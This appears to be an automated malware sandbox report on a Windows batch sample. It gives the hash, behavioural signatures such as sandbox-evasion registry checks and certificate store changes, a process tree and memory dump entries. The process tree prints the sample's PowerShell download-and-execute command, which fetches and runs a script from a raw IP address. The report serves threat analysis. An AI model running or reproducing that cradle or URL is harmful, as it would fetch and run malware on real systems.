Analysis

  • max time kernel
    137s
  • resource
    win10v191014
  • submitted
    16-12-2019 11:10

General

  • Target

    pRGiJZE2.bat

  • Sample

    191216-m49vymh516

  • SHA256

    2d37f42015e8465ca0b781a56385c0b4a90e131b8a7fef6fa43afb8e7821f662

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/pRGiJZE2

Signatures

  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Windows security modification 2 TTPs 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Checks for installed software on the system 1 TTPs 63 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Drops file in System32 directory 3 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Program crash 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\pRGiJZE2.bat"
    1⤵
      PID:4988
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/pRGiJZE2');Invoke-AYHODA;Start-Sleep -s 10000"
        2⤵
          PID:5032
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 704
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious behavior: EnumeratesProcesses
            • Program crash
            PID:1984
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k WerSvcGroup
        1⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of WriteProcessMemory
        PID:3016
      • \??\c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost
        1⤵
          PID:2012
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
          1⤵
            PID:996
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
            1⤵
            • Drops file in System32 directory
            PID:4688
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k wsappx -s ClipSVC
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4744
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s wisvc
            1⤵
              PID:3968
            • C:\Windows\system32\SppExtComObj.exe
              C:\Windows\system32\SppExtComObj.exe -Embedding
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:4384
              • C:\Windows\System32\SLUI.exe
                "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
                2⤵
                  PID:4344
              • \??\c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                1⤵
                • Drops file in Windows directory
                PID:4164
              • \??\c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                1⤵
                  PID:4784
                • \??\c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
                  1⤵
                    PID:3564
                  • \??\c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k unistacksvcgroup
                    1⤵
                      PID:1760
                    • \??\c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
                      1⤵
                        PID:4576

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WERD224.tmp.csv

                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WERD283.tmp.txt

                      • memory/1984-21-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-12-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-7-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-8-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-0-0x0000000004430000-0x0000000004431000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-10-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-11-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-22-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-13-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-23-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-14-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-16-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-17-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-18-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-19-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-20-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-9-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-6-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-15-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-24-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-25-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-26-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-27-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-28-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-29-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-30-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-31-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-32-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-33-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-34-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-35-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-5-0x0000000004E90000-0x0000000004E91000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-4-0x0000000002B30000-0x0000000002B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/1984-39-0x0000000004D20000-0x0000000004D22000-memory.dmp

                        Filesize

                        8KB